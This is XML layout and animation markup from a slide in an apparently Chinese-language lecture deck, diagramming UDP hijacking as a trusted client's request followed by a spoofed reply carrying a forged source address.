            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6419850" y="5653088"/>
            <a:ext cx="1679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6090" name="TextBox 74"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3492500" y="5734050"/>
            <a:ext cx="1679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800">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="46091" name="TextBox 75"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="395288" y="3708400"/>
            <a:ext cx="1681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可信客户端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6092" name="TextBox 76"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2555875" y="2586038"/>
            <a:ext cx="127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600" b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Gungsuh" panose="02030600000101010101" pitchFamily="18" charset="-127"/>
                <a:ea typeface="Gungsuh" panose="02030600000101010101" pitchFamily="18" charset="-127"/>
                <a:sym typeface="Gungsuh" panose="02030600000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>① </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode" panose="020B0602030504020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="Lucida Sans Unicode" panose="020B0602030504020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>UDP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode" panose="020B0602030504020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="黑体" pitchFamily="49" charset="-122"/>
                <a:sym typeface="黑体" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>请求</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6093" name="TextBox 77"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1979613" y="3317875"/>
            <a:ext cx="23002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600" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Gungsuh" panose="02030600000101010101" pitchFamily="18" charset="-127"/>
                <a:ea typeface="Gungsuh" panose="02030600000101010101" pitchFamily="18" charset="-127"/>
                <a:sym typeface="Gungsuh" panose="02030600000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>② </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Gungsuh" panose="02030600000101010101" pitchFamily="18" charset="-127"/>
                <a:sym typeface="Gungsuh" panose="02030600000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>填充</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode" panose="020B0602030504020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="Lucida Sans Unicode" panose="020B0602030504020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>UDP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode" panose="020B0602030504020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="黑体" pitchFamily="49" charset="-122"/>
                <a:sym typeface="黑体" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>应答源地址</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:latin typeface="Lucida Sans Unicode" panose="020B0602030504020204" pitchFamily="34" charset="0"/>
              <a:sym typeface="Lucida Sans Unicode" panose="020B0602030504020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode" panose="020B0602030504020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="Lucida Sans Unicode" panose="020B0602030504020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>192.168.1.104</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1800">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="46094" name="Elbow Connector 17"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="10800000">
            <a:off x="2482850" y="3213100"/>
            <a:ext cx="1728788" cy="1584325"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val -704"/>
            </a:avLst>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="28575">
            <a:solidFill>
              <a:schemeClr val="accent2"/>
            </a:solidFill>
            <a:prstDash val="dash"/>
            <a:bevel/>
            <a:tailEnd type="arrow" w="med" len="med"/>
          </a:ln>
          <a:extLst>
            <a:ext uri="{909E8E84-426E-40DD-AFC4-6F175D3DCCD1}">
              <a14:hiddenFill xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
                <a:noFill/>
              </a14:hiddenFill>
            </a:ext>
          </a:extLst>
        </p:spPr>
      </p:cxnSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="2" name="Group 15"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="2266950" y="2997200"/>
            <a:ext cx="5113338" cy="1655763"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="5112568" cy="1656184"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="141330" name="Elbow Connector 22"/>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks noChangeShapeType="1"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="0" y="0"/>
              <a:ext cx="2160240" cy="1656184"/>
            </a:xfrm>
            <a:prstGeom prst="bentConnector3">
              <a:avLst>
                <a:gd name="adj1" fmla="val 99968"/>
              </a:avLst>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="28575">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
              <a:prstDash val="dash"/>
              <a:bevel/>
              <a:tailEnd type="arrow" w="med" len="med"/>
            </a:ln>
            <a:extLst>
              <a:ext uri="{909E8E84-426E-40DD-AFC4-6F175D3DCCD1}">
                <a14:hiddenFill xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
                  <a:noFill/>
                </a14:hiddenFill>
              </a:ext>
            </a:extLst>
          </p:spPr>
        </p:cxnSp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="141331" name="Elbow Connector 31"/>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks noChangeShapeType="1"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="0" y="0"/>
              <a:ext cx="5112568" cy="1584176"/>
            </a:xfrm>
            <a:prstGeom prst="bentConnector3">
              <a:avLst>
                <a:gd name="adj1" fmla="val 99926"/>
              </a:avLst>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="28575">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
              <a:prstDash val="dash"/>
              <a:bevel/>
              <a:tailEnd type="arrow" w="med" len="med"/>
            </a:ln>
            <a:extLst>
              <a:ext uri="{909E8E84-426E-40DD-AFC4-6F175D3DCCD1}">
                <a14:hiddenFill xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
                  <a:noFill/>
                </a14:hiddenFill>
              </a:ext>
            </a:extLst>
          </p:spPr>
        </p:cxnSp>
      </p:grpSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="46098" name="Straight Arrow Connector 35"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="5400000" flipH="1" flipV="1">
            <a:off x="6587331" y="3933032"/>
            <a:ext cx="1152525" cy="1588"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="28575">
            <a:solidFill>
              <a:schemeClr val="accent1"/>
            </a:solidFill>
            <a:prstDash val="dash"/>
            <a:bevel/>
            <a:tailEnd type="arrow" w="med" len="med"/>
          </a:ln>
          <a:extLst>
            <a:ext uri="{909E8E84-426E-40DD-AFC4-6F175D3DCCD1}">
              <a14:hiddenFill xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
                <a:noFill/>
              </a14:hiddenFill>
            </a:ext>
          </a:extLst>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="46099" name="TextBox 36"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6178550" y="3789363"/>
            <a:ext cx="127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UDP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode" panose="020B0602030504020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="黑体" pitchFamily="49" charset="-122"/>
                <a:sym typeface="黑体" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>应答</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141329" name="Freeform 17"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="395288" y="836613"/>
            <a:ext cx="1800225" cy="1655762"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 0 w 1296144"/>
              <a:gd name="T1" fmla="*/ 1719360 h 1296144"/>
              <a:gd name="T2" fmla="*/ 703517 w 1296144"/>
              <a:gd name="T3" fmla="*/ 503587 h 1296144"/>
              <a:gd name="T4" fmla="*/ 2401967 w 1296144"/>
              <a:gd name="T5" fmla="*/ 1 h 1296144"/>
              <a:gd name="T6" fmla="*/ 4100407 w 1296144"/>
              <a:gd name="T7" fmla="*/ 503590 h 1296144"/>
              <a:gd name="T8" fmla="*/ 4803926 w 1296144"/>
              <a:gd name="T9" fmla="*/ 1719368 h 1296144"/>
              <a:gd name="T10" fmla="*/ 4100404 w 1296144"/>
              <a:gd name="T11" fmla="*/ 2935138 h 1296144"/>
              <a:gd name="T12" fmla="*/ 2401961 w 1296144"/>
              <a:gd name="T13" fmla="*/ 3438729 h 1296144"/>
              <a:gd name="T14" fmla="*/ 703517 w 1296144"/>
              <a:gd name="T15" fmla="*/ 2935138 h 1296144"/>
              <a:gd name="T16" fmla="*/ 8 w 1296144"/>
              <a:gd name="T17" fmla="*/ 1719368 h 1296144"/>
              <a:gd name="T18" fmla="*/ 0 w 1296144"/>
              <a:gd name="T19" fmla="*/ 1719360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en-US" altLang="zh-CN" sz="2800" b="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="黑体" pitchFamily="49" charset="-122"/>
                <a:ea typeface="黑体" pitchFamily="49" charset="-122"/>
                <a:sym typeface="Lucida Sans Unicode" panose="020B0602030504020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>UDP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" b="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="黑体" pitchFamily="49" charset="-122"/>
                <a:ea typeface="黑体" pitchFamily="49" charset="-122"/>
                <a:sym typeface="Lucida Sans Unicode" panose="020B0602030504020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>劫持</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" b="1">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="黑体" pitchFamily="49" charset="-122"/>
              <a:ea typeface="黑体" pitchFamily="49" charset="-122"/>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088"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="7" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="46088"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="8" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="46088"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="9" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="46088"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="10" presetID="53" presetClass="entr" presetSubtype="16" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="11" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="46084"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="12" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="46084"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="13" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="46084"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="14" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="46084"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="15" presetID="53" presetClass="entr" presetSubtype="16" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="16" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="46085"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="17" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="46085"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="18" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="46085"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="19" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="46085"/>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46090"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="23" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="46090"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="24" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="46090"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="25" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="46090"/>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6089"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="28" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="46089"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="29" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="46089"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="30" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="4608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6091"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="33" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="46091"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="34" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="46091"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="35" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="46091"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y-.1"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="36" presetID="17" presetClass="entr" presetSubtype="10" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="37" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="46086"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="38" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="46086"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="39" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="46086"/>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46087"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="42" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="46087"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="43" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="4608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p:cBhvr>
                                        <p:cTn id="48" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2"/>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46092"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="51" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="46092"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="52" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="46092"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="53" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="4609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6094"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="58" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="4609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098"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
